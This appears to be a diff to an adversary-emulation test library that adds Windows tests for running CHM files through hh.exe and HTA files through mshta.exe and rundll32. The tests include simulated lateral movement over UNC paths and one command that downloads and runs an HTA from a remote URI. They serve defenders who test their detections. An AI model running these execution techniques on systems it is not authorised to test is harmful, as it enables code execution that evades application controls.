+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic
+Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>
@@ -43,3 +43,152 @@ atomic_tests:
      hh.exe #{remote_chm_file}
    name: command_prompt

+- name: Invoke CHM with default Shortcut Command Execution
+  auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+  description: Executes a CHM file with the default Shortcut Command method.
+  supported_platforms:
+  - windows
+  input_arguments:
+    chm_file_path:
+      description: Default path of CHM
+      type: string
+      default: Test.chm
+    hh_file_path:
+      description: path of modified HH.exe
+      type: path
+      default: $env:windir\hh.exe
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+    name: powershell
+
+- name: Invoke CHM with InfoTech Storage Protocol Handler
+  auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+  description: Executes a CHM file with the ITS protocol handler.
+  supported_platforms:
+  - windows
+  input_arguments:
+    hh_file_path:
+      description: path of modified HH.exe
+      type: path
+      default: $env:windir\hh.exe
+    infotech_storage_handler:
+      description: Default InfoTech Storage Protocol Handler
+      type: string
+      default: its
+    chm_file_path:
+      description: Default path of CHM
+      type: string
+      default: Test.chm
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+    name: powershell
+
+- name: Invoke CHM Simulate Double click
+  auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+  description: Executes a CHM file simulating a user double click.
+  supported_platforms:
+  - windows
+  input_arguments:
+    chm_file_path:
+      description: Default path of CHM
+      type: string
+      default: Test.chm
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+    name: powershell
+
+- name: Invoke CHM with Script Engine and Help Topic
+  auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+  description: Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+  supported_platforms:
+  - windows
+  input_arguments:
+    topic_extension:
+      description: Default Help Topic
+      type: string
+      default: html
+    hh_file_path:
+      description: path of modified HH.exe
+      type: path
+      default: $env:windir\hh.exe
+    infotech_storage_handler:
+      description: Default InfoTech Storage Protocol Handler
+      type: string
+      default: its
+    script_engine:
+      description: Default Script Engine
+      type: string
+      default: JScript
+    chm_file_path:
+      description: Default path of CHM
+      type: string
+      default: Test.chm
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+    name: powershell
+
+- name: Invoke CHM Shortcut Command with ITS and Help Topic
+  auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+  description: Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+  supported_platforms:
+  - windows
+  input_arguments:
+    topic_extension:
+      description: Default Help Topic
+      type: string
+      default: html
+    hh_file_path:
+      description: path of modified HH.exe
+      type: path
+      default: $env:windir\hh.exe
+    infotech_storage_handler:
+      description: Default InfoTech Storage Protocol Handler
+      type: string
+      default: its
+    chm_file_path:
+      description: Default path of CHM
+      type: string
+      default: Test.chm
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+    name: powershell
@@ -18,6 +18,18 @@ Mshta.exe can be used to bypass application control solutions that do not accoun

 - [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta)

+- [Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement](#atomic-test-4---invoke-html-application---jscript-engine-over-local-unc-simulating-lateral-movement)
+
+- [Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click](#atomic-test-5---invoke-html-application---jscript-engine-simulating-double-click)
+
+- [Atomic Test #6 - Invoke HTML Application - Direct download from URI](#atomic-test-6---invoke-html-application---direct-download-from-uri)
+
+- [Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler](#atomic-test-7---invoke-html-application---jscript-engine-with-rundll32-and-inline-protocol-handler)
+
+- [Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler](#atomic-test-8---invoke-html-application---jscript-engine-with-inline-protocol-handler)
+
+- [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path)
+

 <br/>

@@ -109,4 +121,270 @@ remove-item "#{temp_file}" -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+| mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
+Executes an HTA Application using JScript script engine simulating double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Invoke HTML Application - Direct download from URI
+Executes an HTA Application by directly downloading from remote URI.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
+| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| rundll32_file_path | Location of rundll32.exe | string | $env:windir&#92;system32&#92;rundll32.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
+Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
+Executes an HTA Application with Simulate lateral movement over UNC Path.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>
@@ -50,4 +50,168 @@ atomic_tests:
      mshta "#{temp_file}"
    cleanup_command: |
      remove-item "#{temp_file}" -ErrorAction Ignore
+    name: powershell
+
+- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+  auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+  description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+  supported_platforms:
+  - windows
+  input_arguments:
+    script_engine:
+      description: Script Engine to use
+      type: string
+      default: JScript
+    hta_file_path:
+      description: HTA file name and or path to be used
+      type: string
+      default: Test.hta
+    mshta_file_path:
+      description: Location of mshta.exe
+      type: string
+      default: $env:windir\system32\mshta.exe
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}'
+    name: powershell
+
+- name: Invoke HTML Application - Jscript Engine Simulating Double Click
+  auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+  description: Executes an HTA Application using JScript script engine simulating double click.
+  supported_platforms:
+  - windows
+  input_arguments:
+    script_engine:
+      description: Script Engine to use
+      type: string
+      default: JScript
+    hta_file_path:
+      description: HTA file name and or path to be used
+      type: string
+      default: Test.hta
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick'
+    name: powershell
+
+- name: Invoke HTML Application - Direct download from URI
+  auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+  description: Executes an HTA Application by directly downloading from remote URI.
+  supported_platforms:
+  - windows
+  input_arguments:
+    mshta_file_path:
+      description: Location of mshta.exe
+      type: string
+      default: $env:windir\system32\mshta.exe
+    hta_uri:
+      description: URI to HTA
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+    name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+  auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+  description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+  supported_platforms:
+  - windows
+  input_arguments:
+    rundll32_file_path:
+      description: Location of rundll32.exe
+      type: string
+      default: $env:windir\system32\rundll32.exe
+    script_engine:
+      description: Script Engine to use
+      type: string
+      default: JScript
+    protocol_handler:
+      description: Protocol Handler to use
+      type: string
+      default: About
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+    name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+  auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+  description: Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+  supported_platforms:
+  - windows
+  input_arguments:
+    mshta_file_path:
+      description: Location of mshta.exe
+      type: string
+      default: $env:windir\system32\mshta.exe
+    script_engine:
+      description: Script Engine to use
+      type: string
+      default: JScript
+    protocol_handler:
+      description: Protocol Handler to use
+      type: string
+      default: About
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+    name: powershell
+
+- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+  auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+  description: Executes an HTA Application with Simulate lateral movement over UNC Path.
+  supported_platforms:
+  - windows
+  input_arguments:
+    mshta_file_path:
+      description: Location of mshta.exe
+      type: string
+      default: $env:windir\system32\mshta.exe
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
    name: powershell
@@ -578,3 +578,18 @@ da75ae8d-26d6-4483-b0fe-700e4df4f037
 342cc723-127c-4d3a-8292-9c0c6b4ecadc
 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
 ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+14920ebd-1d61-491a-85e0-fe98efe37f25
+cbbff285-9051-444a-9d17-c07cd2d230eb
+e9f2b777-3123-430b-805d-5cedc66ab591
+2988133e-561c-4e42-a15f-6281e6a9b2db
+29d6f0d7-be63-4482-8827-ea77126c1ef7
+b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+5decef42-92b8-4a93-9eb2-877ddcb9401a
+4f83adda-f5ec-406d-b318-9773c9ca92e5
+15756147-7470-4a83-87fb-bb5662526247
+007e5672-2088-4853-a562-7490ddc19447
+58a193ec-131b-404e-b1ca-b35cf0b18c33
+39ceed55-f653-48ac-bd19-aceceaf525db
+e7e3a525-7612-4d68-a5d3-c4649181b8af
+d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+b8a8bdb2-7eae-490d-8251-d5e0295b2362